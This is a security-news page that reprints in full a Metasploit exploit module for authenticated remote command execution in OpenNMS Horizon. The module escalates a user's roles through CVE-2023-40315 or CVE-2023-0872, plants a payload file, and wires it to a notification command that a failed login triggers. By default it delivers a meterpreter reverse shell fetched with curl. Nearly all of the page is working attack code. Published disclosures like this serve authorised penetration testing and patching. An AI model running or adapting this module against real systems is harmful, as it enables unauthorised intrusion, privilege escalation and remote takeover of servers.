Security
Headlines
HeadlinesLatestCVEs

Headline

OpenNMS Horizon 31.0.7 Remote Command Execution

This Metasploit module exploits built-in functionality in OpenNMS Horizon in order to execute arbitrary commands as the opennms user. For versions 32.0.2 and higher, this module requires valid credentials for a user with ROLE_FILESYSTEM_EDITOR privileges and either ROLE_ADMIN or ROLE_REST. For versions 32.0.1 and lower, credentials are required for a user with ROLE_FILESYSTEM_EDITOR, ROLE_REST, and/or ROLE_ADMIN privileges. In that case, the module will automatically escalate privileges via CVE-2023-40315 or CVE-2023-0872 if necessary. This module has been successfully tested against OpenNMS version 31.0.7.

Packet Storm
#web#linux#js#git#rce#perl#xpath#auth#ruby
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'OpenNMS Horizon Authenticated RCE',        'Description' => %q{          This module exploits built-in functionality in OpenNMS          Horizon in order to execute arbitrary commands as the          opennms user. For versions 32.0.2 and higher, this          module requires valid credentials for a user with          ROLE_FILESYSTEM_EDITOR privileges and either          ROLE_ADMIN or ROLE_REST.          For versions 32.0.1 and lower, credentials are          required for a user with ROLE_FILESYSTEM_EDITOR,          ROLE_REST, and/or ROLE_ADMIN privileges. In that case,          the module will automatically escalate privileges via          CVE-2023-40315 or CVE-2023-0872 if necessary.          This module has been successfully tested against OpenNMS          version 31.0.7        },        'License' => MSF_LICENSE,        'Author' => [          'Erik Wynter' # @wyntererik - Discovery and Metasploit        ],        'References' => [          ['CVE', '2023-40315'], # CVE for privilege escalation via ROLE_FILESYSTEM_EDITOR in OpenNMS Horizon before 32.0.2          ['CVE', '2023-0872'], # CVE for privilege escalation via ROLE_REST in OpenNMS Horizon before 32.0.2        ],        'Platform' => 'linux',        'Arch' => 'ARCH_CMD',        'DefaultOptions' => {          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',          'RPORT' => 8980,          'SRVPORT' => 8080,          'FETCH_COMMAND' => 'CURL',          'FETCH_FILENAME' => Rex::Text.rand_text_alpha(2..4),          'FETCH_WRITABLE_DIR' => '/tmp',          'FETCH_SRVPORT' => 8081,          'WfsDelay' => 15 # It takes a while for the payload to execute        },        'Targets' => [ [ 'Linux', {} ] ],        'DefaultTarget' => 0,        'Privileged' => true,        'DisclosureDate' => '2023-07-01',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options [      OptString.new('TARGETURI', [true, 'The base path to OpenNMS', '/opennms/']),      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin'])    ]    register_advanced_options [      OptInt.new('PRIVESC_SAVE_DELAY', [true, 'The time in seconds to wait for privesc changes to go into effect.', 3])    ]  end  def username    datastore['USERNAME']  end  def password    datastore['PASSWORD']  end  def privesc_save_delay    datastore['PRIVESC_SAVE_DELAY']  end  def notification_commands_file    'notificationCommands.xml'  end  def destination_paths_file    'destinationPaths.xml'  end  def notifications_file    'notifications.xml'  end  def users_file    'users.xml'  end  def check    # Try to authenticate    success, msg_or_check_code = opennms_login('check')    return msg_or_check_code unless success    vprint_status(msg_or_check_code)    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'index.jsp'),      'keep_cookies' => true    })    unless res      return CheckCode::Unknown('Connection failed.')    end    # If we are authenticating as a user without dashboard privileges, the response code will be 403, so we can't use this    # Instead, we should simply check if the HTLM body includes the expected title and version information    unless res.get_html_document.xpath('//title').text.include?('OpenNMS Web Console')      return CheckCode::Detected('Failed to access the OpenNMS Web Console after authentication.')    end    # Based on the version history (https://www.opennms.com/version-history/) all OpenNMS Horizon versions follow the \d+\.\d+\.\d+ pattern    version = res.body.scan(/- Version: (\d+\.\d+\.\d+)$/)&.flatten&.first    if version.blank?      return CheckCode::Detected('Failed to obtain a valid OpenNMS version.')    end    begin      rex_version = Rex::Version.new(version)    rescue ArgumentError => e      return CheckCode::Unknown("Failed to obtain a valid OpenNMS version: #{e}")    end    if rex_version < Rex::Version.new('32.0.2')      print_status("The target is OpenNMS version #{version} and is likely vulnerable to CVE-2023-40315 and CVE-2023-0872.")    else      print_status("The target is OpenNMS version #{version}.")    end    # Check if we can access the user configuration file. There are two ways to do this:    # - Via the /rest/users endpoint. This is possible only for users with ROLE_ADMIN and ROLE_REST privileges.    # - Via /rest/filesystem/contents?f=users.xml. This is possible only for users with ROLE_FILESYSTEM_EDITOR privileges.    # If neither of these work for us, RCE won't be possible.    success, xml_doc_or_check_code = grab_and_parse_xml_config_file(users_file, 'users', 'user', 'check', filesystem: false) # try the REST endpoint first    unless success      success, xml_doc_or_check_code = grab_and_parse_xml_config_file(users_file, 'users', 'user', 'check') # try the filesystem endpoint next      return xml_doc_or_check_code unless success # in this case xml_doc_or_check_code is a CheckCode so we can return it directly    end    # Extract the privileges of the current user    success, privs_or_check_code = grab_user_privs(xml_doc_or_check_code, 'check')    return privs_or_check_code unless success    # Successful exploitation requires the user to have FILESYSTEM_EDITOR privileges as well as either REST or ADMIN privileges    if privs_or_check_code.include?('ROLE_FILESYSTEM_EDITOR')      if privs_or_check_code.include?('ROLE_REST') || privs_or_check_code.include?('ROLE_ADMIN')        # We don't need to escalate privileges here        @highest_priv = 'GOD'        return CheckCode::Appears("User #{username} has the required privileges for exploitation to work without privilege escalation.")      end      @highest_priv = 'ROLE_FILESYSTEM_EDITOR'    elsif privs_or_check_code.include?('ROLE_ADMIN')      @highest_priv = 'ROLE_ADMIN'      return CheckCode::Appears("User #{username} has #{@highest_priv} privileges. Exploitation is likely possible via privilege escalation to ROLE_FILESYSTEM_EDITOR.")    elsif privs_or_check_code.include?('ROLE_REST')      @highest_priv = 'ROLE_REST'    else      return CheckCode::Safe("User #{username} does not have the required privileges for exploitation to work.")    end    # If we are here, we have ROLE_FILESYSTEM_EDITOR privileges or ROLE_REST privileges, but not both and not ROLE_ADMIN    # This means that privilege escalation is required, which can work only if the OpenNMS version is 32.0.1 or lower    if rex_version >= Rex::Version.new('32.0.2')      return CheckCode::Detected("Exploitation requires privilege escalation, which is not possible for OpenNMS version #{version}.")    end    cve = if @highest_priv == 'ROLE_FILESYSTEM_EDITOR'            'CVE-2023-40315'          else            'CVE-2023-0872'          end    CheckCode::Appears("User #{username} has #{@highest_priv} privileges. Exploitation is likely possible via #{cve}.")  end  # This method is use to handle failures based on the stage of the exploit  #  # @param mode [String] The mode to use: check, exploit or cleanup  # @param message [String] The message to display to the user  # @param status [String] The status to use: disconnected, unexpected_reply or no_access  # @return [Array] An array containing a boolean and a CheckCode or message  def deal_with_failure_by_mode(mode, message, status)    return [false, "#{message}. Manual cleanup is required."] if mode == 'cleanup'    case status    when 'disconnected'      return [false, CheckCode::Unknown(message)] if mode == 'check'      fail_with(Failure::Disconnected, message)    when 'unexpected_reply'      return [false, CheckCode::Unknown(message)] if mode == 'check'      fail_with(Failure::UnexpectedReply, message)    when 'no_access'      return [false, CheckCode::Safe(message)] if mode == 'check'      fail_with(Failure::NoAccess, message)    end  end  # This method is used to perform a login attempt  #  # @param mode [String] The mode to use: check, exploit or cleanup  # @param perform_invalid_login [Boolean] Whether to perform a login attempt with random credentials or not  # @return [Array] An array containing a boolean and a CheckCode or message  def opennms_login(mode, perform_invalid_login: false)    if perform_invalid_login      user = Rex::Text.rand_text_alpha(8..12)      pass = Rex::Text.rand_text_alpha(8..12)      keep_cookies = false    else      user = username      pass = password      keep_cookies = true      res1 = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, 'login.jsp'),        'keep_cookies' => keep_cookies      })      unless res1        return deal_with_failure_by_mode(mode, 'Connection failed.', 'disconnected')      end      unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenNMS Web Console')        msg = if mode == 'check'                'Target is not an OpenNMS application.'              else                'Received unexpected response while attempting to access the OpenNMS Web Console.'              end        return deal_with_failure_by_mode(mode, msg, 'unexpected_reply')      end    end    # Try to authenticate    res2 = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'j_spring_security_check'),      'keep_cookies' => keep_cookies,      'vars_post' => {        'j_username' => user,        'j_password' => pass      }    })    unless res2      if perform_invalid_login        return [false, "Connection failed while attempting to trigger the notification. The payload likely wasn't executed."]      else        return deal_with_failure_by_mode(mode, 'Connection failed while attempting to authenticate.', 'disconnected')      end    end    unless res2.redirect? && res2.redirection.to_s.end_with?('/index.jsp')      if perform_invalid_login        return [true, 'Received expected response while triggering the payload. Please be patient, it may take a few seconds for the payload to execute.']      else        message = if mode == 'check'                    'Authentication failed. Please check your credentials.'                  else                    'Received unexpected response while attempting to authenticate.'                  end        return deal_with_failure_by_mode(mode, message, 'unexpected_reply')      end    end    # Authentication was successful    if perform_invalid_login      return [false, "Received unexpected response while attempting to trigger the notification. The payload likely wasn't executed."]    end    [true, 'Successfully authenticated']  end  # This method is used to obtain and parse an XML configuration file from the target via the filesystem endpoint  #  # @param file_name [String] The name of the file to obtain  # @param root_element [String] The name of the root element in the XML file  # @param element [String] The name of the element to obtain from the XML file  # @param mode [String] The mode to use: check, exploit or cleanup. This is used to determine how to proceed upon failure  # @param filesystem [Boolean] Whether to use the filesystem endpoint or not. If not, the file_name will be used as the REST endpoint  # @return [Array] An array containing a boolean and either a CheckCode, a message or a Nokogiri::XML::Document  def grab_and_parse_xml_config_file(file_name, root_element, element, mode, filesystem: true)    request_hash = {      'method' => 'GET',      'keep_cookies' => true    }    if filesystem      request_hash['uri'] = normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents')      request_hash['vars_get'] = { 'f' => file_name }    else      request_hash['uri'] = normalize_uri(target_uri.path, 'rest', file_name)    end    # Try to obtain the file    res = send_request_cgi(request_hash)    unless res      return deal_with_failure_by_mode(mode, "Connection failed while attempting to obtain the current #{file_name} file.", 'disconnected')    end    # when using the filesystem endpoint to obtain the users.xml file, the root element is userinfo, which contains the users element    if file_name == users_file      if filesystem        filesystem_root_element = 'userinfo'      else        filesystem_root_element = 'users'      end    else      filesystem_root_element = root_element    end    unless res.code == 200 && res.body.strip.end_with?("</#{filesystem_root_element}>")      return deal_with_failure_by_mode(mode, "Unexpected response received while attempting to obtain the #{file_name} file. User #{username} my lack the required privileges.", 'unexpected_reply')    end    # Parse the file    begin      doc = Nokogiri::XML(res.body)      elements = doc&.at_css(root_element)&.css(element)&.map { |e| e&.text }    rescue Nokogiri::XML::SyntaxError => e      return deal_with_failure_by_mode(mode, "Failed to parse the #{file_name} file: #{e}", 'unexpected_reply')    end    if elements.blank?      return deal_with_failure_by_mode(mode, "No #{element} elements were found in the #{file_name} file.", 'unexpected_reply')    end    [true, doc]  end  # This method is used to obtain the privileges of a user from the users.xml file  #  # @param xml_doc [Nokogiri::XML::Document] The XML document containing the users  # @param mode [String] The mode to use: check, exploit or cleanup  # @return [Array] An array containing a boolean and a CheckCode, message, or an array of privileges  def grab_user_privs(xml_doc, mode)    privileges = []    begin      user = xml_doc&.at_css('users')&.css('user')&.find { |u| u.at_css('user-id')&.text == username }      if user.blank?        return deal_with_failure_by_mode(mode, "Failed to parse the users.xml file. User #{username} was not found.", 'unexpected_reply')      end      privileges = user.css('role')&.map { |r| r&.text }      if privileges.blank?        return deal_with_failure_by_mode(mode, "Failed to parse the users.xml file. No roles were found for user #{username}.", 'unexpected_reply')      end    rescue Nokogiri::XML::SyntaxError => e      return deal_with_failure_by_mode(mode, "Failed to parse the users.xml file: #{e}", 'unexpected_reply')    end    vprint_status("User #{username} has the following privileges: #{privileges.join(' ')}")    [true, privileges]  end  # This method is used to escalate or deescalate privileges  #  # @param deescalate [Boolean] Whether to escalate or deescalate privileges  # @return [Array] An array containing a boolean and a CheckCode or message  def escalate_or_deescalate_privs(deescalate: false)    # Establish some variables based on if we need to escalate or deescalate privileges    if deescalate      use_filesystem = @role_to_add != 'ROLE_FILESYSTEM_EDITOR'      mode = 'cleanup'    else      use_filesystem = @highest_priv == 'ROLE_FILESYSTEM_EDITOR'      mode = 'exploit'    end    # grab and parse the users.xml file    success, xml_doc_or_msg = grab_and_parse_xml_config_file(users_file, 'users', 'user', mode, filesystem: use_filesystem)    return [false, xml_doc_or_msg] unless success    # Get the privileges of the current user as a sanity check    success, privileges_or_msg = grab_user_privs(xml_doc_or_msg, mode)    return [false, privileges_or_msg] unless success    # if we are here to remove privileges, check if we actually have the privileges we want to remove. return otherwise    if deescalate && privileges_or_msg.exclude?(@role_to_add)      return [false, 'Did not find the required privileges to deescalate. Manual cleanup may be required.']    end    # if we need to escalate privileges, check if we already have the privileges we want to escalate to. return otherwise    unless deescalate      if use_filesystem        if privileges_or_msg.include?('ROLE_ADMIN') || privileges_or_msg.include?('ROLE_REST')          # We don't need to escalate privileges here          @highest_priv = 'GOD'          return [true]        end        @role_to_add = 'ROLE_ADMIN'      else        if privileges_or_msg.include?('ROLE_FILESYSTEM_EDITOR')          # We don't need to escalate privileges here          @highest_priv = 'GOD'          return [true]        end        @role_to_add = 'ROLE_FILESYSTEM_EDITOR'      end    end    # Add or remove the required role to the current user    if use_filesystem      # If we have ROLE_FILESYSTEM_EDITOR privileges, we can use the filesystem endpoint to add or remove the required role      begin        user = xml_doc_or_msg.at_css('users').css('user').find { |u| u.at_css('user-id')&.text == username }        if user.blank?          message = "Did not find the current user in the users.xml file while attempting to #{deescalate ? 'deescalate' : 'escalate'} privileges."          return deal_with_failure_by_mode(mode, message, 'unexpected_reply')        end        if deescalate          role = user.css('role').find { |r| r.text == @role_to_add }          if role.blank?            return [false, 'Failed to parse the users.xml file while attempting to deescalate privileges. Manual cleanup is required.']          end          role.remove        else          user.add_child(xml_doc_or_msg.create_element('role', @role_to_add))        end      rescue Nokogiri::XML::SyntaxError => e        return deal_with_failure_by_mode(mode, "Failed to parse the users.xml file while attempting to #{deescalate ? 'deescalate' : 'escalate'} privileges: #{e}", 'unexpected_reply')      end      # upload the edited users.xml file via the filesystem endpoint      success, message = upload_xml_config_file(users_file, generate_post_data(users_file, xml_doc_or_msg.to_xml(indent: 3)), mode)      unless deescalate        # If we have escalated privileges via the filesystem, we need to wait a few seconds for the changes to be saved        print_status("Waiting #{privesc_save_delay} seconds for the changes to be saved...")        sleep(privesc_save_delay)      end      return [false, message] unless success # this is only used for cleanup. for exploit this cannot happen    else      # If we do not have FILESYSTEM_EDITOR privileges, we can use the REST endpoint to do this      # /users/{username}/roles/{rolename} with PUT to add a role and DELETE to remove a role      res = send_request_cgi({        'method' => deescalate ? 'DELETE' : 'PUT',        'uri' => normalize_uri(target_uri.path, 'rest', 'users', username, 'roles', @role_to_add),        'keep_cookies' => true      }, 2) # for some reason the server does not send a response when this request is performed via Ruby, but it does tend to work. When sending the same request via Burp suite, the server did respond.      # 204 = no content, 304 = not modified. 204 indicates success, 304 indicates that the role was already added/removed      if res && ![204, 304].include?(res.code)        return deal_with_failure_by_mode(mode, "Received unexpected reply while attempting to #{deescalate ? 'deescalate' : 'escalate'} privileges", 'unexpected_reply')      end    end    # Get the users.xml file again to make sure our changes were saved    success, xml_doc_or_msg = grab_and_parse_xml_config_file(users_file, 'users', 'user', mode, filesystem: use_filesystem)    return [false, xml_doc_or_msg] unless success # this is only used for cleanup. for exploit this cannot happen    # Get the privileges of the current user again to make sure our changes were saved    success, privs_or_msg = grab_user_privs(xml_doc_or_msg, mode)    return [false, privs_or_msg] unless success    # Check if our changes were saved    if deescalate      if privs_or_msg.include?(@role_to_add)        return [false, 'Failed to deescalate privileges. Manual cleanup is required.']      end      return [true, "Successfully deescalated privileges by removing #{@role_to_add}"]    end    # If we are here, we are escalating privileges    unless privs_or_msg.include?(@role_to_add)      fail_with(Failure::UnexpectedReply, 'Failed to escalate privileges')    end    @highest_priv = 'GOD'    [true, "Successfully escalated privileges by adding #{@role_to_add}"]  end  # This method is used to generate the XML document that will be used to add a notification command  #  # @param file_name [String] The name of the file to upload  # @param xml_doc [Nokogiri::XML::Document] The XML document to upload  # @return [Rex::MIME::Message] The post data  def generate_post_data(file_name, data_to_write)    post_data = Rex::MIME::Message.new    post_data.add_part(data_to_write, 'text/xml', nil, "form-data; name=\"upload\"; filename=\"#{file_name}\"")    post_data  end  # This method is used to upload an XML configuration file to the target  #  # @param file_name [String] The name of the file to upload  # @param post_data [Rex::MIME::Message] The post data to upload  # @param mode [String] The mode to use: exploit or cleanup  # @return [Array] An array containing a boolean and an optional message  def upload_xml_config_file(file_name, post_data, mode = 'exploit')    # upload the edited notificationCommands.xml file    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents'),      'vars_get' => { 'f' => file_name },      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'keep_cookies' => true,      'data' => post_data.to_s    })    unless res      return deal_with_failure_by_mode(mode, "Connection failed while attempting to upload the #{file_name} file", 'disconnected')    end    unless res.code == 200 && res.body.include?('Successfully wrote to')      return deal_with_failure_by_mode(mode, "Unexpected response received while attempting to upload the #{file_name} file", 'unexpected_reply')    end    [true]  end  def find_element_via_at_css(file_name)    if [destination_paths_file, notifications_file].include?(file_name)      return false    end    true  end  # This method is used to edit an XML configuration file  #  # @param file_name [String] The name of the file to edit  # @param root_element [String] The name of the root element in the XML file  # @param element [String] The name of the element to edit in the XML file  def edit_xml_config_file(file_name, root_element, element)    # First we need to get the current #{file_name} file, so we can edit our #{element_name} in it    _success, xml_doc = grab_and_parse_xml_config_file(file_name, root_element, element, 'exploit')    # update the xml document with a new element    new_value = Rex::Text.rand_text_alpha(8..12)    case file_name    when notification_commands_file      xml_doc = add_notification_command(xml_doc, new_value)    when destination_paths_file      xml_doc = add_destination_path(xml_doc, new_value)    when notifications_file      xml_doc = add_notification(xml_doc, new_value)    end    # upload the edited #{file_name} file via the filesystem endpoint    upload_xml_config_file(file_name, generate_post_data(file_name, xml_doc.to_xml(indent: 3)), 'exploit')    # generate global variables for cleanup    case file_name    when notification_commands_file      @notification_command_name = new_value    when destination_paths_file      @destination_path_name = new_value    when notifications_file      @notification_name = new_value    end    # Get the #{file_name} file again to make sure our #{element_name} was edited    _success, xml_doc = grab_and_parse_xml_config_file(file_name, root_element, element, 'exploit')    # Check if our #{element_name} was edited    if find_element_via_at_css(file_name)      full_element = xml_doc.at_css(root_element).css(element).find { |e| e.at_css('name')&.text == new_value }    else      full_element = xml_doc.at_css(root_element).css(element).find { |e| e['name'] == new_value }    end    if full_element.blank?      fail_with(Failure::UnexpectedReply, "Failed to verify that the #{file_name} file was successfully edited")    end    print_status("Successfully edited #{file_name}")  end  # This method is used to add a notification command to a Nokogiri XML document  #  # @param xml_doc [Nokogiri::XML::Document] The XML document to add the notification command to  # @param notification_command_name [String] The name of the notification command to add  # @return [Nokogiri::XML::Document] The updated XML document  def add_notification_command(xml_doc, notification_command_name)    # A notification command is a command that gets executed when a notification is triggered. We can use this to execute our payload.    # Update the xml document with a new notification command    notification_comment = Rex::Text.rand_text_alpha(6..10)    notification_command = xml_doc.create_element('command', 'binary' => 'true') # Change binary attribute value if needed    name = xml_doc.create_element('name', notification_command_name)    execute = xml_doc.create_element('execute', '/usr/bin/bash')    comment = xml_doc.create_element('comment', notification_comment)    argument = xml_doc.create_element('argument', 'streamed' => 'false')    argument_switch = xml_doc.create_element('substitution', "/usr/share/opennms/etc/#{@payload_file_name}")    argument.add_child(argument_switch)    notification_command.add_child(name)    notification_command.add_child(execute)    notification_command.add_child(comment)    notification_command.add_child(argument)    xml_doc.at_css('notification-commands').add_child(notification_command)    xml_doc  end  # This method is used to add a destination path to a Nokogiri XML document  #  # @param xml_doc [Nokogiri::XML::Document] The XML document to add the destination path to  # @param destination_path_name [String] The name of the destination path to add  # @return [Nokogiri::XML::Document] The updated XML document  def add_destination_path(xml_doc, destination_path_name)    # A destination path points to a specific group or user that will receive a notification when a notification is triggered.    # It also indicates which notification command should be executed when the notification is triggered.    # We need to add a destination path that points to our notification command so that it gets executed when a notification is triggered.    # Update the xml document with a new destination path    destination_path = xml_doc.create_element('path', 'name' => destination_path_name)    target = xml_doc.create_element('target')    name = xml_doc.create_element('name', 'Admin')    command = xml_doc.create_element('command', @notification_command_name)    target.add_child(name)    target.add_child(command)    destination_path.add_child(target)    xml_doc.at_css('destinationPaths').add_child(destination_path)    xml_doc  end  # This method is used to add a notification to a Nokogiri XML document  #  # @param xml_doc [Nokogiri::XML::Document] The XML document to add the notification to  # @param notification_name [String] The name of the notification to add  # @return [Nokogiri::XML::Document] The updated XML document  def add_notification(xml_doc, notification_name)    # A notification is triggered when a specific event occurs, and can be configured to call a specific destination path.    # We need to add a notification that will trigger our destination path so that our notification command gets executed.    # Update the xml document with a new notification that will be triggered when a user fails to authenticate    # since that is something we can easily trigger ourselves    notification_message = Rex::Text.rand_text_alpha(6..10)    notification = xml_doc.create_element('notification', 'name' => notification_name, 'status' => 'on')    uei = xml_doc.create_element('uei', 'uei.opennms.org/internal/authentication/failure')    # We need to add a rule for the IP. Let's use a negative comparison with a non-routable IP, which will always work (see RFC 5737)    rule = xml_doc.create_element('rule', "IPADDR != '192.0.2.#{rand(0..255)}'")    destination_path = xml_doc.create_element('destinationPath', @destination_path_name)    text_message = xml_doc.create_element('text-message', notification_message)    notification.add_child(uei)    notification.add_child(rule)    notification.add_child(destination_path)    notification.add_child(text_message)    xml_doc.at_css('notifications').add_child(notification)    xml_doc  end  # This method is used to remove an element from an XML configuration file  #  # @param file_name [String] The name of the file to remove the element from  # @param root_element [String] The name of the root element in the XML file  # @param element [String] The name of the element to remove from the XML file  # @param element_to_remove [String] The name of the element to remove from the XML file  def revert_xml_config_file(file_name, root_element, element, element_to_remove)    # First we need to get the current #{file_name} file, so we can remove our #{element_name} from it    success, xml_doc_or_msg = grab_and_parse_xml_config_file(file_name, root_element, element, 'cleanup')    unless success      print_error(xml_doc_or_msg)      return    end    begin      if find_element_via_at_css(file_name)        full_element = xml_doc_or_msg.at_css(root_element).css(element).find { |e| e.at_css('name')&.text == element_to_remove }      else        full_element = xml_doc_or_msg.at_css(root_element).css(element).find { |e| e['name'] == element_to_remove }      end      unless full_element.present?        print_error("Failed to remove #{element_to_remove} from #{file_name}. Manual cleanup is required")        return      end      full_element.remove    rescue Nokogiri::XML::SyntaxError      print_error("Failed to parse the #{file_name} file while attempting to remove #{element_to_remove}. Manual cleanup is required.")      return    end    # generate post data    post_data = generate_post_data(file_name, xml_doc_or_msg.to_xml(indent: 3))    success, message = upload_xml_config_file(file_name, post_data, 'cleanup')    unless success      print_error(message)      return    end    # Get the #{file_name} file again to make sure our #{element_name} was removed    success, xml_doc_or_msg = grab_and_parse_xml_config_file(file_name, root_element, element, 'cleanup')    unless success      print_error(xml_doc_or_msg)      return    end    # Check if our #{element_name} was removed    if xml_doc_or_msg.at_css(root_element).css(element).map { |e| e.at_css('name')&.text }.include?(element_to_remove)      print_error("Failed to remove #{element_to_remove} from #{file_name}. Manual cleanup is required.")    else      vprint_status("Successfully removed #{element_to_remove} from #{file_name}")    end  end  # This method is used to trigger a reload of the OpenNMS configuration  #  # @param mode [String] The mode to use: exploit or cleanup  # @return [Array] An array containing a boolean and a message  def update_configuration(mode)    # We need to update the configuration in order for our changes to take effect    xml_doc = Nokogiri::XML::Builder.new do |xml|      xml.event('xmlns' => 'http://xmlns.opennms.org/xsd/event') do        xml.uei('uei.opennms.org/internal/reloadDaemonConfig')        xml.source('perl_send_event')        xml.time(Time.now.strftime('%Y-%m-%dT%H:%M:%S%:z'))        xml.host(Rex::Text.rand_text_alpha(8..12))        xml.parms do          xml.parm do            xml.parmName('daemonName')            xml.value('Notifd', { 'type' => 'string', 'encoding' => 'text' })          end        end      end    end    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'rest', 'events'),      'ctype' => 'application/xml',      'keep_cookies' => true,      'data' => xml_doc.to_xml(indent: 3)    })    unless res      message = 'Connection failed while attempting to update the configuration.'      message += ' The cleanup changes have not been applied, but will be at the next config reload.' if mode == 'cleanup'      return deal_with_failure_by_mode(mode, message, 'disconnected')    end    unless res.code == 202      message = 'Received unexpected response while attempting to update the configuration.'      message += ' The cleanup changes have not been applied, but will be at the next config reload.' if mode == 'cleanup'      return deal_with_failure_by_mode(mode, message, 'unexpected_reply')    end    [true, 'Successfully updated the configuration']  end  # This method is used to write the payload to a .bsh file and trigger the notification  #  # @param cmd [String] The command to execute  def write_payload_to_bsh_file(cmd)    # We need to write our payload to a .bsh file so that it can be executed by the notification command    post_data = generate_post_data(@payload_file_name, cmd)    res1 = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents'),      'vars_get' => { 'f' => @payload_file_name },      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'keep_cookies' => true,      'data' => post_data.to_s    })    unless res1      fail_with(Failure::Disconnected, 'Connection failed while attempting to upload the payload file')    end    unless res1.code == 200 && res1.body.include?('Successfully wrote to')      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload file')    end    # Get the payload file again to make sure it was uploaded successfully    res2 = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents'),      'vars_get' => { 'f' => @payload_file_name },      'keep_cookies' => true    })    unless res2      fail_with(Failure::Disconnected, 'Connection failed while attempting to obtain the current payload file')    end    unless res2.code == 200 && res2.body == cmd      fail_with(Failure::UnexpectedReply, 'Failed to verify that the payload file was successfully uploaded')    end    print_good("Successfully uploaded the payload to #{@payload_file_name}")    @payload_written = true  end  def execute_command(cmd, _opts = {})    # Write the payload to a .bsh file    write_payload_to_bsh_file(cmd)    print_status('Triggering the notification to execute the payload')    # Trigger the notification by performing a login attempt using random credentials    success, message = opennms_login('exploit', perform_invalid_login: true)    if success      print_status(message)    else      print_error(message)    end  end  # Horizon installs with notifications globally disabled by default. This exploit depends on notification being enabled  # in order to obtain RCE. If notifications are disabled a user with administrative privileges is able to turn them on.  # https://docs.opennms.com/horizon/30/operation/notifications/getting-started.html  def ensure_notifications_enabled    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'index.jsp'),      'keep_cookies' => true    })    fail_with(Failure::UnexpectedReply, 'Failed to determine if notifications were enabled') unless res    if res.get_html_document.xpath('//i[contains(@title, \'Notices: On\')]').empty?      vprint_status('Notifications are not enabled, meaning the target is not exploitable as is. Enabling notifications now...')      res2 = send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'admin', 'updateNotificationStatus'),        'keep_cookies' => true,        'vars_post' => {          'status' => 'on'        }      })      fail_with(Failure::UnexpectedReply, 'Failed to enable notifications') unless res2 && res2.redirect? && res2.redirection.to_s.end_with?('/index.jsp')    end    vprint_good('Notifications are enabled')  end  def exploit    # Check if we need to escalate privileges    if @highest_priv && @highest_priv != 'GOD'      # This is not performed if the user has set FORCEEXPLOIT to true. In that case we'll just start the exploit chain and hope for the best.      _success, msg = escalate_or_deescalate_privs      print_good(msg) if msg.present? # _success will always be true here, otherwise we would have failed already    end    # Let's make sure we have a valid session by clearing the cookie jar and logging in again    # This will also ensure that any new privileges we may have added are applied    cookie_jar.clear    _success, message = opennms_login('exploit')    vprint_status(message) # _success will always be true here, otherwise we would have failed already    # Check to ensure Notifications are turned on. If they are disabled, enable them.    ensure_notifications_enabled    # Generate a random payload file name    @payload_file_name = "#{Rex::Text.rand_text_alpha(8..12)}.bsh".downcase    # Add a notification command    edit_xml_config_file(notification_commands_file, 'notification-commands', 'command')    # Add a destination path    edit_xml_config_file(destination_paths_file, 'destinationPaths', 'path')    # Add a notification    edit_xml_config_file(notifications_file, 'notifications', 'notification')    # Update the configuration changes we made    update_configuration('exploit')    # Write the payload and trigger the notification    execute_command(payload.encoded)  end  def cleanup    return if [@payload_file_name, @notification_name, @destination_path_name, @notification_command_name, @role_to_add].all?(&:blank?)    print_status('Attempting cleanup...')    # to be on the safe side, we'll clear the cookie jar and log in again    cookie_jar.clear    success, message = opennms_login('cleanup')    if success      vprint_status(message)    else      print_error(message)      return    end    # Delete the payload file    if @payload_file_name.present? && @payload_written      res = send_request_cgi({        'method' => 'DELETE',        'uri' => normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents'),        'vars_get' => { 'f' => @payload_file_name },        'keep_cookies' => true      })      unless res        print_error("Connection failed while attempting to delete the payload file #{@payload_file_name}. Manual cleanup is required.")        return      end      unless res.code == 200 && res.body.include?('Successfully deleted')        print_error("Failed to delete the payload file #{@payload_file_name}. Manual cleanup is required.")        return      end      vprint_good("Successfully deleted the payload file #{@payload_file_name}")    end    # Delete the notification    revert_xml_config_file(notifications_file, 'notifications', 'notification', @notification_name) if @notification_name.present?    # Delete the destination path    revert_xml_config_file(destination_paths_file, 'destinationPaths', 'path', @destination_path_name) if @destination_path_name.present?    # Delete the notification command    revert_xml_config_file(notification_commands_file, 'notification-commands', 'command', @notification_command_name) if @notification_command_name.present?    # Update the configuration changes we made    success, message = update_configuration('cleanup')    if success      vprint_status(message)    else      print_error(message)    end    # Revert the privilege escalation if necessary    if @role_to_add.present?      success, message = escalate_or_deescalate_privs(deescalate: true)      if success        vprint_status(message)      else        print_error(message)      end    end  endend

Related news

GHSA-hf5p-f83x-5q2g: OpenNMS privilege escalation vulnerability

